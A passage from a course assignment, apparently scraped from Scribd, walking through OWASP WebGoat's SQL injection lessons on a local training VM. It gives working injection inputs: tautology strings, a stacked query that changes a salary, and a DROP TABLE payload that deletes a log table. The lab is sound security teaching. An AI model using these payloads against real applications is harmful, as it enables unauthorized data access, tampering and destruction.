[go: up one dir, main page]
Scribd
Upload
60 views12 pages

Use WebGoat To Test Web Applications

The project involves using WebGoat to test web applications for SQL injection vulnerabilities. Participants are required to run the WebGoat application, log in, and complete lessons focused on SQL injection techniques. The expected deliverables include executing specific SQL queries as outlined in the lessons to understand and mitigate injection attacks.

Uploaded by

dreambot.diaries
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
60 views12 pages

Use WebGoat To Test Web Applications

The project involves using WebGoat to test web applications for SQL injection vulnerabilities. Participants are required to run the WebGoat application, log in, and complete lessons focused on SQL injection techniques. The expected deliverables include executing specific SQL queries as outlined in the lessons to understand and mitigate injection attacks.

Uploaded by

dreambot.diaries
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

Course-End Project

Use WebGoat to Test Web Applications


Project Agenda: Use WebGoat to test web applications for any vulnerabilities and perform
SQL Injection attack

Description: In your new role as a cybersecurity specialist, you will be required to test the
company’s website for any vulnerabilities and to prevent the organization from any injection
attack.

For this purpose, you are required to test web application for SQL injection using WebGoat.

WebGoat is a deliberately insecure application maintained by OWASP designed to teach


developers to test vulnerabilities commonly found in web applications that use common and
popular open-source components.

Tools Required: WebGoat VM

Expected Deliverables:

Run the WebGoat web app from your WebGoat VM

Login/Register on the WebGoat web app

Open (A1) Injection -> SQL Injection (Intro) and complete lessons 1 to 13

Steps to be followed:

1. Running the WebGoat application from WebGoat Ubuntu VM

2. Logging in/Registering on the WebGoat web app

3. Opening (A1) Injection -> SQL Injection (Intro) and completing the lessons 1 to 13

Step 1: Running the WebGoat application from WebGoat Ubuntu VM


1.1 Open Firefox web browser on your WebGoat Ubuntu Linux VM and go to the following
URL:

http://127.0.0.1:8080/WebGoat/login

Step 2: Logging in/Registering on the WebGoat web app


2.1 Register and log in as a new user
2.2 Follow the instructions for each exercise:
Step 3: Opening (A1) Injection -> SQL Injection (Intro) and completing the
lessons 1 to 13
3.1 Click on the (A1) Injection -> SQL Injection (Intro) as shown in the following screenshot:

3.2 Click and scroll down to the bottom of lesson 2, write the following query and submit:

SELECT department FROM employees WHERE userid=96134


3.3 Follow the instructions same as the last step and submit the following code in lesson 3:

UPDATE employees SET department='Sales' WHERE userid=89762


3.4 Write the following code in lesson 4 and submit:

ALTER table employees ADD phone varchar (20)

3.5 Write the following code in lesson 5 and submit:

3.6 Write the following code in lesson 9 and click on Get Account Info:

'

OR
'1' = '1

Your query was: SELECT * FROM user_data WHERE first_name = 'John' and last_name =
'' or '1' = '1'

3.7 Write the following code in lesson 10 and click on Get Account Info:

Login_Count: 0 (any numeric value)

User_id: 0 OR True
Your query was: SELECT * From user_data WHERE Login_Count = 0 and userid= 0 OR
True

3.8 Write the following code in lesson 11 and click on Get Department:

Employee Name: A

Authentication TAN: ' or '1' = '1


3.9 Write the following code in lesson 12 and click on Get Department:

Employee Name: A

Authentication TAN: '; UPDATE employees SET salary=99999 WHERE first_name='John


3.10 Open lesson 13, write the following code in the Action contains box, and click on
Search logs:

%'; DROP TABLE access_log;--

You might also like